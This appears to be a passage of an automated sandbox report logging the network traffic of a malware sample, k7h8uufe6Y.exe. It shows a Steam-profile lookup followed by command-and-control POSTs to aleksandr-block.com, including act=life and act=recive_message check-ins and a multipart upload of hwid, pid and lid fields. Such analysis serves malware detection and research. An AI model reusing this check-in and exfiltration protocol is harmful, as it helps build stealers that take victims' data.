0	192.168.2.4	49733	104.102.49.254	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:31 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-14 07:55:32 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 14 Jan 2025 07:55:32 GMT Content-Length: 35141 Connection: close Set-Cookie: sessionid=59b8cc1598fbfebf0b80691b; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-14 07:55:32 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-14 07:55:32 UTC	16384	IN	Data Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
2025-01-14 07:55:32 UTC	3768	IN	Data Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
2025-01-14 07:55:32 UTC	510	IN	Data Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 Data Ascii: ank">Steam Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:32 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: aleksandr-block.com
2025-01-14 07:55:32 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-14 07:55:33 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=338cbknve2d1kvfj9omdrvb340; expires=Sat, 10 May 2025 01:42:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vhL8YaAx%2FtSfA9oxMYmPxu%2BYrmU71qYUdNl0tIFssG%2FtLuzMGf6cVYIXhPqGhd9v1K7P88E10QMtgW9RmswvtJjNMOok0ABb%2BlIVK6UO70sPon5IEXpR9No5wDQoHxGnfFOctzNW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c107b2f827d20-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1980&rtt_var=754&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=910&delivery_rate=1441263&cwnd=207&unsent_bytes=0&cid=77f83e2ee3426154&ts=450&x=0"
2025-01-14 07:55:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-14 07:55:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:33 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: aleksandr-block.com
2025-01-14 07:55:33 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=BbL7Kk--DiFi&j=
2025-01-14 07:55:34 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q444r0delcehrfr9hord1c1156; expires=Sat, 10 May 2025 01:42:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7m6yBckRx8G%2FR1amAKiGOjq6LN5KdDv8h3IG5GXp5WwbJBVyPQbjNETLPDqA8APczBK8uzcIh8rWtO6jo11WSwqylDGu2%2BSl3offDqUJhiY9D6XHc4SDJ97FcReTvEx9OH4gR7oL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c10811f7c4402-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1571&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1808049&cwnd=182&unsent_bytes=0&cid=bdbe1142b122f46e&ts=492&x=0"
2025-01-14 07:55:34 UTC	246	IN	Data Raw: 34 39 39 34 0d 0a 4e 50 4b 4b 4f 6a 36 6d 58 73 65 2b 70 6f 4a 49 4d 62 65 56 69 54 57 2f 50 4a 54 49 6f 44 48 64 4a 46 58 75 49 56 54 61 42 56 6c 50 30 50 77 59 42 4a 4a 79 35 63 33 44 6f 48 4a 46 78 65 44 73 47 5a 31 64 38 4f 71 61 56 37 78 49 4a 6f 73 4e 64 71 78 6f 65 77 36 55 36 31 5a 4e 77 33 4c 6c 32 39 36 67 63 6d 72 4d 74 2b 78 62 6e 51 61 32 72 63 70 54 76 45 67 33 6a 30 6f 37 71 6d 6b 36 58 4a 37 74 55 6c 76 46 4f 71 62 53 79 2b 63 74 56 4e 62 2f 35 31 7a 53 56 50 6e 71 6a 42 4f 34 58 6e 66 55 41 78 6d 2f 63 54 68 35 6b 2f 6c 52 48 4e 74 79 76 4a 7a 44 37 47 6f 4c 6c 66 54 73 56 39 4e 61 38 4b 50 49 57 62 56 41 4e 6f 70 4c 4a 4c 4e 6a 4d 56 79 51 37 6c 4e 52 7a 43 36 72 32 4d 7a 73 4b 31 37 57 74 36 55 58 32 6b 61 32 Data Ascii: 4994NPKKOj6mXse+poJIMbeViTW/PJTIoDHdJFXuIVTaBVlP0PwYBJJy5c3DoHJFxeDsGZ1d8OqaV7xIJosNdqxoew6U61ZNw3Ll296gcmrMt+xbnQa2rcpTvEg3j0o7qmk6XJ7tUlvFOqbSy+ctVNb/51zSVPnqjBO4XnfUAxm/cTh5k/lRHNtyvJzD7GoLlfTsV9Na8KPIWbVANopLJLNjMVyQ7lNRzC6r2MzsK17Wt6UX2ka2
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 38 6f 49 41 6a 55 55 6d 6e 56 59 37 71 47 46 37 53 64 37 78 47 46 76 49 66 50 32 63 7a 4f 77 6b 56 74 62 34 37 46 62 64 54 50 6d 71 77 56 75 33 51 6a 32 44 54 44 6d 32 62 54 78 65 6d 65 39 58 57 38 77 36 71 74 2b 45 72 6d 70 55 7a 62 65 7a 46 2f 31 4f 39 61 6e 57 58 71 34 47 4b 4d 4a 61 64 72 39 72 65 77 37 51 37 6c 5a 64 79 54 79 33 31 4d 2f 72 4c 30 48 65 2f 75 5a 61 33 56 50 38 70 63 46 54 75 45 77 39 67 30 6b 79 74 57 6f 39 56 70 43 6f 46 68 7a 44 4a 4f 57 45 68 4d 4d 76 51 39 4c 37 2f 52 58 6e 48 75 6e 6b 32 78 4f 34 53 6e 66 55 41 7a 36 39 5a 44 68 64 6e 2b 74 51 56 39 59 38 74 39 72 4a 35 54 68 56 30 50 6e 68 56 4d 39 55 2b 4b 7a 42 57 72 52 50 4d 6f 74 48 64 76 59 6e 50 45 37 51 73 42 68 39 79 54 65 70 31 74 50 67 61 6b 79 62 37 71 74 51 30 52 36 Data Ascii: 8oIAjUUmnVY7qGF7Sd7xGFvIfP2czOwkVtb47FbdTPmqwVu3Qj2DTDm2bTxeme9XW8w6qt+ErmpUzbezF/1O9anWXq4GKMJadr9rew7Q7lZdyTy31M/rL0He/uZa3VP8pcFTuEw9g0kytWo9VpCoFhzDJOWEhMMvQ9L7/RXnHunk2xO4SnfUAz69ZDhdn+tQV9Y8t9rJ5ThV0PnhVM9U+KzBWrRPMotHdvYnPE7QsBh9yTep1tPgakyb7qtQ0R6
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 72 4d 47 65 63 78 45 4c 76 67 2f 65 33 79 54 2f 46 74 57 68 67 6d 6d 30 73 72 6e 50 42 50 4b 75 66 49 58 32 6c 4b 32 38 6f 4a 65 76 6b 34 78 6e 6b 77 37 75 32 6b 31 57 5a 58 6e 55 46 7a 45 4d 61 44 59 7a 2b 73 70 58 74 48 6c 34 56 66 56 57 2f 65 67 79 42 50 78 42 6a 43 55 41 32 37 34 56 69 78 64 30 74 31 62 55 73 6f 37 73 35 7a 62 72 6a 4d 54 30 76 75 72 44 35 31 54 2f 71 2f 48 58 4c 35 4d 4f 59 6c 4a 4f 72 42 70 4f 45 53 66 37 46 68 51 7a 44 61 6f 30 73 44 6f 49 31 6a 65 38 65 74 57 31 78 36 34 36 73 56 4c 2f 78 35 33 75 45 51 36 74 57 68 35 59 35 50 6d 56 6c 76 53 66 4c 71 53 33 61 41 74 58 35 57 76 71 31 76 55 58 76 32 67 78 6c 4f 34 53 7a 4b 50 52 44 57 31 59 44 46 59 6c 2b 78 55 56 63 6b 36 70 64 76 41 35 54 68 57 33 50 76 6e 46 35 4d 65 38 62 4b 43 Data Ascii: rMGecxELvg/e3yT/FtWhgmm0srnPBPKufIX2lK28oJevk4xnkw7u2k1WZXnUFzEMaDYz+spXtHl4VfVW/egyBPxBjCUA274Vixd0t1bUso7s5zbrjMT0vurD51T/q/HXL5MOYlJOrBpOESf7FhQzDao0sDoI1je8etW1x646sVL/x53uEQ6tWh5Y5PmVlvSfLqS3aAtX5Wvq1vUXv2gxlO4SzKPRDW1YDFYl+xUVck6pdvA5ThW3PvnF5Me8bKC
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 43 41 41 32 37 34 62 6a 4a 45 6e 75 5a 52 55 63 49 30 6f 74 4c 4a 36 79 78 59 30 76 44 74 57 74 56 54 38 36 6e 44 56 37 56 55 4e 49 64 4a 4f 37 49 6e 64 52 61 58 38 42 67 45 68 42 75 70 39 64 54 37 4f 45 57 56 36 4b 56 4f 6e 56 6e 36 36 70 6f 54 76 45 6b 2b 67 30 73 2b 74 32 67 2f 57 4a 62 75 56 56 6e 4c 4e 72 66 55 79 75 30 68 58 4e 37 6c 36 31 72 5a 55 76 4b 69 79 56 6e 2f 43 48 65 4c 57 33 62 67 4a 77 35 62 6e 2b 68 62 53 6f 51 6a 36 38 57 45 35 79 59 54 6a 62 66 6e 57 64 31 52 2b 71 62 4a 57 37 35 4b 4f 59 74 47 50 37 42 76 4b 56 65 55 34 46 6c 53 79 7a 32 68 32 63 48 6b 4c 56 66 54 2b 4b 73 5a 6e 56 6e 75 36 70 6f 54 6b 47 45 43 7a 6d 49 4d 2b 48 68 31 54 39 44 76 56 42 79 63 66 4b 6e 66 79 4f 67 6c 56 64 7a 37 34 56 37 57 55 76 32 75 7a 6c 71 36 51 Data Ascii: CAA274bjJEnuZRUcI0otLJ6yxY0vDtWtVT86nDV7VUNIdJO7IndRaX8BgEhBup9dT7OEWV6KVOnVn66poTvEk+g0s+t2g/WJbuVVnLNrfUyu0hXN7l61rZUvKiyVn/CHeLW3bgJw5bn+hbSoQj68WE5yYTjbfnWd1R+qbJW75KOYtGP7BvKVeU4FlSyz2h2cHkLVfT+KsZnVnu6poTkGECzmIM+Hh1T9DvVBycfKnfyOglVdz74V7WUv2uzlq6Q
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 77 71 6d 41 79 52 4a 37 6c 56 31 54 4d 4e 61 54 59 77 65 30 73 58 39 2f 32 37 46 6e 54 56 72 62 6b 67 6c 53 6e 42 6d 2f 4d 59 69 61 6a 64 53 31 62 73 65 56 58 48 4e 74 79 76 4a 7a 44 37 47 6f 4c 6c 66 37 35 55 39 42 4d 2f 36 33 4d 58 4c 78 55 4e 6f 46 49 4a 4c 39 6f 50 31 47 63 37 6c 64 61 78 54 6d 76 30 4d 50 6c 49 56 7a 5a 74 36 55 58 32 6b 61 32 38 6f 4a 39 74 46 55 67 6a 30 30 39 72 6e 78 37 53 64 37 78 47 46 76 49 66 50 32 63 78 2b 73 68 56 39 58 37 36 31 50 51 58 75 53 6c 78 56 53 32 54 53 57 47 52 44 47 7a 62 7a 42 5a 6c 76 70 55 55 74 59 35 74 38 36 45 72 6d 70 55 7a 62 65 7a 46 2b 74 5a 35 72 72 42 45 59 35 51 4e 4a 70 49 4f 37 51 6e 4a 42 69 4a 71 46 39 51 68 47 54 6c 32 73 76 70 4b 56 7a 55 2f 75 64 61 32 46 66 7a 71 38 52 58 74 55 77 33 69 6b Data Ascii: wqmAyRJ7lV1TMNaTYwe0sX9/27FnTVrbkglSnBm/MYiajdS1bseVXHNtyvJzD7GoLlf75U9BM/63MXLxUNoFIJL9oP1Gc7ldaxTmv0MPlIVzZt6UX2ka28oJ9tFUgj009rnx7Sd7xGFvIfP2cx+shV9X761PQXuSlxVS2TSWGRDGzbzBZlvpUUtY5t86ErmpUzbezF+tZ5rrBEY5QNJpIO7QnJBiJqF9QhGTl2svpKVzU/uda2Ffzq8RXtUw3ik
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 49 68 61 58 35 42 67 45 68 44 2b 69 33 38 58 71 49 31 2f 61 38 4f 39 46 31 31 6e 6b 71 38 4e 59 73 6b 6f 33 67 55 34 38 75 57 34 32 57 70 33 76 58 31 50 42 66 4f 75 63 77 2f 68 71 43 35 58 57 35 6c 7a 52 42 61 7a 71 33 52 32 6d 42 6a 43 41 41 32 37 34 5a 7a 46 54 6d 75 56 62 55 38 63 75 70 4e 72 57 34 43 64 5a 78 2f 33 67 55 74 42 54 2b 36 6e 45 56 62 52 4b 4a 59 56 44 4e 62 4d 6e 64 52 61 58 38 42 67 45 68 42 2b 79 79 73 37 6e 4a 6b 58 65 39 75 68 42 30 45 36 32 35 49 4a 43 75 46 64 33 31 46 55 6d 72 32 41 6b 47 49 6d 6f 58 31 43 45 5a 4f 58 61 7a 65 59 74 56 64 76 6c 37 6c 48 53 55 66 2b 6a 78 6c 75 38 52 6a 4f 49 52 44 4f 37 61 7a 42 52 6b 2b 64 63 56 63 6f 31 71 70 79 4b 6f 43 31 4c 6c 61 2b 72 64 73 5a 64 2b 71 65 43 54 50 46 66 64 34 74 50 64 75 41 Data Ascii: IhaX5BgEhD+i38XqI1/a8O9F11nkq8NYsko3gU48uW42Wp3vX1PBfOucw/hqC5XW5lzRBazq3R2mBjCAA274ZzFTmuVbU8cupNrW4CdZx/3gUtBT+6nEVbRKJYVDNbMndRaX8BgEhB+yys7nJkXe9uhB0E625IJCuFd31FUmr2AkGImoX1CEZOXazeYtVdvl7lHSUf+jxlu8RjOIRDO7azBRk+dcVco1qpyKoC1Lla+rdsZd+qeCTPFfd4tPduA
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 4d 68 54 53 73 45 37 73 35 37 78 34 79 52 64 30 75 47 72 53 4f 49 51 74 71 58 59 45 2b 64 2f 4c 73 78 45 4f 76 67 2f 65 30 4f 58 36 46 39 47 30 6a 75 70 7a 63 2f 74 4a 6e 48 61 38 50 31 55 30 6c 33 6e 6f 34 35 59 73 67 5a 35 7a 45 51 75 2b 44 39 37 65 5a 66 2b 57 33 50 48 4c 61 79 63 69 71 41 74 52 5a 57 76 71 32 6d 64 54 50 57 36 77 56 79 75 65 48 66 55 57 67 6a 34 62 43 31 52 67 4f 74 4f 56 38 6b 77 74 4f 4b 45 75 48 34 42 68 36 57 35 42 63 49 65 36 5a 57 4d 45 37 34 47 62 37 56 61 64 71 34 6e 59 77 54 65 71 45 6f 63 6e 48 7a 69 33 39 62 79 4c 46 44 44 39 4b 78 70 34 33 6e 67 6f 4d 56 44 75 46 45 34 7a 41 31 32 74 79 64 6a 62 39 44 68 58 30 66 56 4b 71 6a 4d 77 36 41 56 48 5a 58 76 71 77 2b 64 61 2f 57 6b 7a 46 53 70 56 33 71 72 56 54 79 2f 64 7a 78 42 Data Ascii: MhTSsE7s57x4yRd0uGrSOIQtqXYE+d/LsxEOvg/e0OX6F9G0jupzc/tJnHa8P1U0l3no45YsgZ5zEQu+D97eZf+W3PHLayciqAtRZWvq2mdTPW6wVyueHfUWgj4bC1RgOtOV8kwtOKEuH4Bh6W5BcIe6ZWME74Gb7Vadq4nYwTeqEocnHzi39byLFDD9Kxp43ngoMVDuFE4zA12tydjb9DhX0fVKqjMw6AVHZXvqw+da/WkzFSpV3qrVTy/dzxB
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 7a 52 4e 36 6e 61 79 66 56 6c 51 73 50 30 2f 56 43 52 56 75 65 6e 7a 68 4f 41 43 48 65 55 41 32 37 34 55 6a 68 59 6e 75 39 4f 54 59 6b 63 72 74 44 48 37 43 74 55 6c 62 6d 72 55 5a 30 47 70 65 53 43 56 36 34 47 62 39 77 52 62 65 30 30 62 41 62 43 39 78 5a 46 68 43 72 6c 68 4a 61 75 61 6b 47 56 72 36 73 51 33 6b 7a 6b 72 4d 46 46 76 41 45 4a 73 6b 49 37 74 79 73 31 58 5a 44 76 53 45 72 66 63 4b 33 66 33 76 6f 55 62 66 37 37 37 56 44 48 57 66 43 4d 34 68 50 78 42 6a 6a 4d 47 77 2f 34 4c 33 74 70 33 71 68 41 48 4a 78 38 6b 4e 2f 4b 37 69 31 46 78 4c 72 44 64 4f 64 6b 74 49 62 46 52 76 31 79 4d 4a 78 53 50 62 56 72 65 78 6a 51 37 68 67 45 6c 48 4c 6c 32 4e 57 67 63 67 4f 48 72 4c 34 45 69 67 36 6b 74 59 78 4b 2f 31 42 33 31 42 46 34 2b 48 56 37 44 74 43 76 57 Data Ascii: zRN6nayfVlQsP0/VCRVuenzhOACHeUA274UjhYnu9OTYkcrtDH7CtUlbmrUZ0GpeSCV64Gb9wRbe00bAbC9xZFhCrlhJauakGVr6sQ3kzkrMFFvAEJskI7tys1XZDvSErfcK3f3voUbf777VDHWfCM4hPxBjjMGw/4L3tp3qhAHJx8kN/K7i1FxLrDdOdktIbFRv1yMJxSPbVrexjQ7hgElHLl2NWgcgOHrL4Eig6ktYxK/1B31BF4+HV7DtCvW
2025-01-14 07:55:34 UTC	1369	IN	Data Raw: 6c 7a 6f 53 34 61 68 54 62 2b 75 70 55 30 31 33 6b 75 4d 52 51 71 55 56 77 73 6e 30 54 74 57 6f 2b 57 4a 66 57 5a 6e 33 4f 4c 4b 6a 54 77 36 49 4b 56 4d 50 30 31 57 6e 71 54 2f 47 36 67 48 57 38 55 44 54 4d 44 58 61 67 4a 32 4d 57 73 65 4a 49 55 63 73 37 35 2f 7a 44 39 69 6b 54 6d 37 66 76 46 34 55 65 30 36 66 50 56 72 46 42 64 61 31 4a 4a 72 56 6f 50 42 53 77 37 30 35 66 68 48 4c 6c 30 49 53 34 61 6c 4c 66 35 2b 5a 59 32 68 4c 78 73 4d 55 54 38 51 59 35 7a 42 74 32 75 57 30 72 57 35 2f 76 46 46 72 4b 4d 75 58 44 69 76 6c 71 52 5a 57 76 75 42 6d 64 54 4c 62 79 67 68 53 38 56 43 57 4b 51 43 43 37 49 41 56 6f 76 66 70 66 54 4d 64 2b 6c 4e 48 41 39 6a 39 51 78 66 44 56 61 66 42 4d 38 62 72 42 45 59 35 51 4e 49 78 4e 4d 66 67 70 65 30 37 51 73 42 68 78 31 6a Data Ascii: lzoS4ahTb+upU013kuMRQqUVwsn0TtWo+WJfWZn3OLKjTw6IKVMP01WnqT/G6gHW8UDTMDXagJ2MWseJIUcs75/zD9ikTm7fvF4Ue06fPVrFBda1JJrVoPBSw705fhHLl0IS4alLf5+ZY2hLxsMUT8QY5zBt2uW0rW5/vFFrKMuXDivlqRZWvuBmdTLbyghS8VCWKQCC7IAVovfpfTMd+lNHA9j9QxfDVafBM8brBEY5QNIxNMfgpe07QsBhx1j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:35 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W91FJIWNPHEMPI21LS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18162 Host: aleksandr-block.com
2025-01-14 07:55:35 UTC	15331	OUT	Data Raw: 2d 2d 57 39 31 46 4a 49 57 4e 50 48 45 4d 50 49 32 31 4c 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 33 43 42 34 45 38 41 37 42 30 38 32 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 57 39 31 46 4a 49 57 4e 50 48 45 4d 50 49 32 31 4c 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 39 31 46 4a 49 57 4e 50 48 45 4d 50 49 32 31 4c 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 0d Data Ascii: --W91FJIWNPHEMPI21LSContent-Disposition: form-data; name="hwid"7D3CB4E8A7B08222B960CC18D99B375A--W91FJIWNPHEMPI21LSContent-Disposition: form-data; name="pid"2--W91FJIWNPHEMPI21LSContent-Disposition: form-data; name="lid"BbL7Kk--DiFi
